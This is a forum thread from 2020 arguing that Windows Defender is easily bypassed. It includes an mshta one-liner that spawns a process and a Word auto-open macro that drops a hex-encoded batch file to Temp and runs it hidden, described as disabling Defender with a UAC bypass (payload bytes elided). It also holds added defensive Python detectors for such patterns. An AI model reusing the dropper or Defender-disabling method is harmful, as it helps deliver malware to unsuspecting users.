Windows Defender - The worst AV ever?

Discussion in 'Application Software' started by Windows_Addict, Feb 7, 2020.

  1. chaython

    chaython MDL Novice

    If VirusTotal doesn't detect the threat then what's anything to do to protect you? If it's already on the system and is executing without detection it could kill pretty much whatever it wants.
    For another AV the virus could take ownership and force delete .sys files for the existing antivirus, making Windows BSOD on reboot.
    If it's spyware and you have a firewall it could still loopback through Firefox...
     
  2. AveYo

    AveYo MDL Expert

    #102 AveYo, Feb 15, 2020
    Last edited: Feb 15, 2020
    VirusTotal is a bit deceiving and should never be used as the sole trust factor, as most products featured don't actually trigger their heuristic/HIPS/sandboxing when being batch-run in VMs.
    0-day and such require hybrid analysis / sandboxing - there are several choices available online now (each with their pros and cons, rip anubis).
    Anyway, that's beside the point.
    It's not considered a threat because it is not a threat. You can't expect others to be more Catholic than the Pope.
    "UAC is not a security boundary" -Microsoft
    But actually proper AVs installed on real machines have heuristics engines that, if not blocking, at least will alert you before executing cmd from notepad, for example.
    And you can't "pull the rug" from other AVs so easily - almost all of them have quite powerful defenses via kernel drivers, and not just one, but multiple redundancies.
    It takes having access to an exploitable signed driver to even begin attacking them.

    What's actually hilarious - or very sad - depending on which point you are looking from, is that Defender immediately goes mad when executing stuff like this:
    Code:
    mshta "javascript:window.close(new ActiveXObject('WScript.Shell').Run('regedit.exe -m', 1, 'False'))"
    Yet it's completely fine with stuff we've showcased in this thread..
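Added example, not part of AveYo's post or of any product's engine: a minimal process-creation heuristic of the kind the post describes (a document or viewer application launching a command interpreter, mshta given inline script, an interpreter running a script out of the temp folder). The event fields, rule names and sample events are constructed for illustration.

```python
import ntpath
import re

# Assumed event shape: {"parent": path, "image": path, "cmdline": str},
# e.g. mapped from process-creation telemetry. Field and rule names are this example's own.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "notepad.exe", "hh.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.I)
TEMP_SCRIPT = re.compile(
    r"(%te?mp%|\\appdata\\local\\temp)\\[^\"\s]+\.(cmd|bat|vbs|js|ps1)\b", re.I)


def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the names of the rules a process-creation event matches."""
    parent, image = base(event["parent"]), base(event["image"])
    hits = []
    if parent in DOC_PARENTS and image in INTERPRETERS:
        hits.append("document-app-spawns-interpreter")
    if image == "mshta.exe" and INLINE_SCRIPT.search(event["cmdline"]):
        hits.append("mshta-inline-script")
    if image in INTERPRETERS and TEMP_SCRIPT.search(event["cmdline"]):
        hits.append("interpreter-runs-temp-script")
    return hits


def triage(events):
    """Keep only events that matched at least one rule."""
    return [(base(e["image"]), classify(e)) for e in events if classify(e)]


# Constructed sample events (not captured from a real system).
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": SYS32 + "cmd.exe", "cmdline": r'cmd.exe /C "%TMP%\d.cmd"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": SYS32 + "mshta.exe", "cmdline": 'mshta "javascript:window.close()"'},
    {"parent": SYS32 + "notepad.exe",
     "image": SYS32 + "cmd.exe", "cmdline": "cmd.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": SYS32 + "cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(image, hits)
```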
     
  3. Windows_Addict

    Windows_Addict MDL Expert

    Relying on VirusTotal results is a bad idea; it does not include real-time execution detection and behavioral detection, it only scans a file in the most basic way.
    A virus can be encrypted and hidden in a file, and VirusTotal will flag it 100% clean, but the antivirus real-time protection will immediately block this threat when the software tries to extract and execute the malicious lines.

    For example, today I tested Kaspersky Free against the methods to bypass WD and UAC posted on page number 5 of this thread. It blocked the UAC bypass methods instantly; it doesn't mean that it'll surely protect against every UAC bypass, but apparently they have a database for such bypasses and they detect them.

    WD should have blocked the UAC bypasses and, for the love of god, at least the .chm help file method, but they don't care; other AVs do, that's the whole point of this thread.

    edit - just saw that BAU posted above too.
     
  4. AveYo

    AveYo MDL Expert

    More troublesome is that there are dozens of so-called "penetration testing" toolkits available to automate multiple methods until one succeeds - most dll-injection/msi/cmstplua/ctf/wnf ones work just fine and not even Kaspersky will cover all of them.. and why should they? Why should a 3rd party fix what Microsoft themselves don't "elevate" (pun-intended) as being an issue?
    Nobody even bothers reporting UAC bypasses anymore, and stuff only ever gets fixed when tangentially hit by a larger issue.
     
  5. nosirrahx

    nosirrahx MDL Expert

    Not only is this true, but it becomes more true every year. It is impossible to replicate a real bare metal system and the actual attack vector used at the point of infection for the torrent of samples coming into VT, so the results should be thought of as a piece of the total picture, not a conclusive answer.
     
  6. Windows_Addict

    Windows_Addict MDL Expert

  7. Krakatoa

    Krakatoa MDL Addicted

    example doc macro
    Code:
    Private Sub Document_Open()
        Dim i As Long
        Dim nFileNum As Integer
        Dim sFilename As String
        Dim strBytes As String
        Dim arrBytes As Variant
        sFilename = Environ("Temp") & "\d.cmd"
        strBytes = "00 00 00 ... 00 00 00"
        strBytes = strBytes & " 00 00 00 ... 00 00 00"
        arrBytes = Split(strBytes)
        nFileNum = FreeFile
        Open sFilename For Binary Lock Read Write As #nFileNum
        For i = LBound(arrBytes) To UBound(arrBytes)
            Put #nFileNum, , CByte("&H" & arrBytes(i))
        Next i
        Close #nFileNum
        Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
    End Sub
    In strBytes is d.cmd as hex.
    In d.cmd is disable Defender (UAC bypass included).
    Undetected.
    Functional under admin account.
    The script can continue by installing malware, the defender will already be disabled.
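Added example, not part of Krakatoa's post and not a replacement for a real macro scanner: static triage that flags the combination of traits the macro above shows (auto-run entry point, file written to disk, process launched). The trait names, patterns and sample macros are constructed for illustration.

```python
import re

# Trait names and patterns are this example's own, not those of any scanner.
TRAITS = {
    "auto_exec": re.compile(
        r"\bSub\s+(Document_Open|AutoOpen|Workbook_Open|Auto_Open)\b", re.I),
    "writes_file": re.compile(r"\bOpen\b.+\bFor\s+(Binary|Output)\b|\bPut\s+#", re.I),
    "hex_decode": re.compile(r"CByte\s*\(\s*\"&H\"", re.I),
    "runs_process": re.compile(r"\bShell\s*\(|WScript\.Shell|\.Run\b", re.I),
    "temp_path": re.compile(r"Environ\s*\(\s*\"(Temp|Tmp)\"\s*\)|%te?mp%", re.I),
}


def strip_comments(source):
    """Drop whole-line VBA comments so commented-out code is not counted."""
    kept = []
    for line in source.splitlines():
        text = line.strip().lower()
        if not (text.startswith("'") or text.startswith("rem ")):
            kept.append(line)
    return "\n".join(kept)


def macro_traits(source):
    """Sorted names of the traits found in the macro source."""
    code = strip_comments(source)
    return sorted(name for name, rx in TRAITS.items() if rx.search(code))


def is_dropper(source):
    """True when the macro auto-runs, writes a file and starts a process."""
    return {"auto_exec", "writes_file", "runs_process"} <= set(macro_traits(source))


# Constructed samples: the suspicious one keeps only the shape of the macro
# above, with a single placeholder byte instead of any payload.
SUSPICIOUS = r'''Private Sub Document_Open()
    sFilename = Environ("Temp") & "\d.cmd"
    Open sFilename For Binary Lock Read Write As #1
    Put #1, , CByte("&H" & "00")
    Close #1
    Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
End Sub'''
BENIGN = '''Private Sub Document_Open()
    ' Call Shell("cmd.exe") is only mentioned in this comment
    MsgBox "Welcome"
End Sub'''

if __name__ == "__main__":
    print(macro_traits(SUSPICIOUS), is_dropper(SUSPICIOUS))
    print(macro_traits(BENIGN), is_dropper(BENIGN))
```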
     
  8. AveYo

    AveYo MDL Expert

    #108 AveYo, Feb 22, 2020
    Last edited: Feb 24, 2020
  9. AveYo

    AveYo MDL Expert

  10. Windows_Addict

    Windows_Addict MDL Expert

    Installed Windows 10 2004; it seems like WD has been improved a bit to deal with unwanted applications. I noticed some changes in notifications and warnings and in the way it denies running an app.

    BAU's .cmd and .chm file methods to disable WD are still working fine without warning from WD, so yeah, it's still the worst AV.

    Anyone's whole system can be destroyed if someone decides to send such files over email masquerading as an invoice file or some other important work-related file from some company; if properly sent, most users will download and run it. The script will then simply proceed to download malware/ransomware and execute it, and all of this is very simple to do.

    It's hard to believe that almost no one in the mainstream section seems to talk about such a big security flaw, especially now that the majority runs Windows 10 and most of them rely on WD to protect the system.

    I tried to inform some security-related sites about it but got no response from them, yet they still mention how tamper protection is very effective and will save users from malware.
     
  11. AveYo

    AveYo MDL Expert

    Pff. I had assumed the April security patch had fixed it, since it mentions a s**tload of CVEs regarding elevation of privileges and token manipulation, in all Windows versions (even discontinued 7 got patched). So the easiest to exploit UAC backdoor still remains; it's "by design" and "won't fix". Tx, Microsoft!
     
  12. shewolf

    shewolf MDL Senior Member

    #113 shewolf, Apr 26, 2020
    Last edited: Apr 26, 2020
  13. Windows_Addict

    Windows_Addict MDL Expert

    Seems like you haven't tested the awesome effectiveness of the mentioned tricks to disable Windows Defender completely.

    The Controlled Folder Access feature is pointless because the script will disable WD and afterwards any process can access anything. I've mentioned previously how malicious actors can easily distribute such scripts to general users.

    Currently my system hardware is not allowing me to test the sandbox feature, but I'm pretty sure that most users who do simple browsing on the internet don't (and won't) use the sandbox for that. I guess the sandbox won't make a difference to disabling WD (running inside the sandbox) with a script.
     
  14. AveYo

    AveYo MDL Expert

    #115 AveYo, Apr 26, 2020
    Last edited: Apr 27, 2020
  15. AveYo

    AveYo MDL Expert

    -duplicate post- delete me
     
  16. shewolf

    shewolf MDL Senior Member

  17. shewolf

    shewolf MDL Senior Member

    #118 shewolf, Apr 26, 2020
    Last edited: Apr 26, 2020
    The same applies to our interaction: read the comments above, learn how to use everything your OS provides in implementing security. Windows 10 provides this option to the average user very well (then you would know what and how the script touches your OS). Instead of spending energy on scripts with no effect (or you are impressing the ignorant), get to know the capabilities of your operating system.


    PS: Dunning-Kruger Effect.

    :eek:
     
  18. AveYo

    AveYo MDL Expert

    Here's a picture of me, interacting: :stupid:
    Joke aside, first you are disrespecting fellow MDL users in this thread by NOT OPENING A GOD DAMN POWERSHELL AND COPY-PASTING THOSE 100 LINES TO PROVE YOUR POINT,
    then you start throwing personal insults without any provocation.
    I don't care.
     
  19. Windows_Addict

    Windows_Addict MDL Expert

    @shewolf I've seen in the WUMT and WUmgr threads how you interact with users. Anyway, I'm attempting one last time to reason with you.

    WD allows saving downloaded files from browsers if you put the download folder in Controlled Folder Access. Even if it doesn't, you would need to enable it so you can download things.

    Once the user clicks on the script, the whole protection will be disabled and any process can access anything in those protected folders.

    What's there to not understand? Which point is incorrect?
     